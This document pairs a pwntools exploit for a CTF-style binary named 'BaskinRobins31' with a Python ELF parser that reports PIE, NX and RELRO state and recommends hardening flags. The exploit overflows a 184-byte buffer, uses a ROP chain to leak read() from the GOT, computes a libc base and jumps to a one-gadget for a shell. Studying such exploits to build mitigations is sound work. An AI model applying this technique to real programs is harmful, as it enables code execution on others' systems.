```python
from pwn import *

p = process('./BaskinRobins31')
e = ELF('./BaskinRobins31')
context(arch='amd64', os='linux', endian='little', log_level='debug')

# Gadget and return target, fixed because the binary is not PIE
POP_RDI_RSI_RDX_RET = 0x0040087a
main = 0x400a4b

# Stage 1: overflow the 184-byte buffer, then write(1, got['read'], 8)
# to leak the resolved address of read(), and return to main for a second input
payload = b"A" * 184
payload += p64(POP_RDI_RSI_RDX_RET)
payload += p64(1)
payload += p64(e.got['read'])
payload += p64(8)
payload += p64(e.plt['write'])
payload += p64(main)
p.send(payload)

# print(p.recvuntil(b"Don't break the rules...:("))
p.recvuntil(b":( \n")
read = u64(p.recv(6) + b"\x00" * 2)
log.success("read leaked : " + hex(read))

# Offsets are from the local libc used in the writeup
libc_base = read - 0xf7250   # in local
oneshot = libc_base + 0xf1147  # in local

# Stage 2: overflow again and return straight into the one-gadget
payload1 = b"A" * 184
payload1 += p64(oneshot)
p.sendline(payload1)
p.interactive()
```
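The chain above only works because the target hands out fixed addresses (main at 0x400a4b, the gadget at 0x40087a) and lets a 184-byte overwrite reach the return address, so the first thing a defender would check on such a binary is its mitigation flags. The following is an added example, not code from the original post: a pure-Python ELF64 header parser that reports PIE/NX/RELRO state, exercised on a constructed minimal image that mirrors a non-PIE, NX-enabled target. It assumes a little-endian x86-64 ELF and reports RELRO as present whenever a PT_GNU_RELRO segment exists (full RELRO would additionally need BIND_NOW).

```python
import struct
import sys

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3               # ET_DYN is the e_type a PIE executable carries
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 1

EHDR = struct.Struct("<4sBBBBB7xHHIQQQIHHHHHH")   # 64-byte ELF64 header
PHDR = struct.Struct("<IIQQQQQQ")                  # 56-byte ELF64 program header


def elf_mitigations(data: bytes) -> dict:
    """Report PIE / NX / RELRO state of a little-endian ELF64 image."""
    (magic, cls, enc, _v, _abi, _abiv, e_type, _m, _ver, _entry, e_phoff,
     _shoff, _flags, _ehsize, e_phentsize, e_phnum, *_rest) = EHDR.unpack_from(data, 0)
    if magic != ELF_MAGIC or cls != 2 or enc != 1:
        raise ValueError("not a little-endian ELF64 image")
    nx, relro = False, False          # no PT_GNU_STACK entry: treat the stack as executable
    for i in range(e_phnum):
        p_type, p_flags, *_ = PHDR.unpack_from(data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True              # at least partial RELRO; full RELRO also needs BIND_NOW
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}


def build_sample(e_type: int, stack_flags: int) -> bytes:
    """Constructed minimal image: one ELF64 header followed by a single PT_GNU_STACK entry."""
    hdr = EHDR.pack(ELF_MAGIC, 2, 1, 1, 0, 0, e_type, 0x3E, 1, 0x400A4B, EHDR.size, 0, 0,
                    EHDR.size, PHDR.size, 1, 0, 0, 0)
    return hdr + PHDR.pack(PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)


def check_file(path: str) -> dict:
    """Run the same report against a real binary on disk."""
    with open(path, "rb") as f:
        return elf_mitigations(f.read())


if __name__ == "__main__":
    # Pass a binary on the command line; otherwise inspect the constructed sample, which
    # mirrors the writeup's target: non-PIE (fixed main/gadget addresses) with an NX stack.
    m = check_file(sys.argv[1]) if len(sys.argv) > 1 else elf_mitigations(build_sample(ET_EXEC, 6))
    print(m)
```

A `pie: False` result is what makes the hardcoded `main` and gadget addresses in the chain reliable; rebuilding with `-fPIE -pie` forces a text leak before any such chain, and `-fstack-protector` blocks the 184-byte overwrite itself.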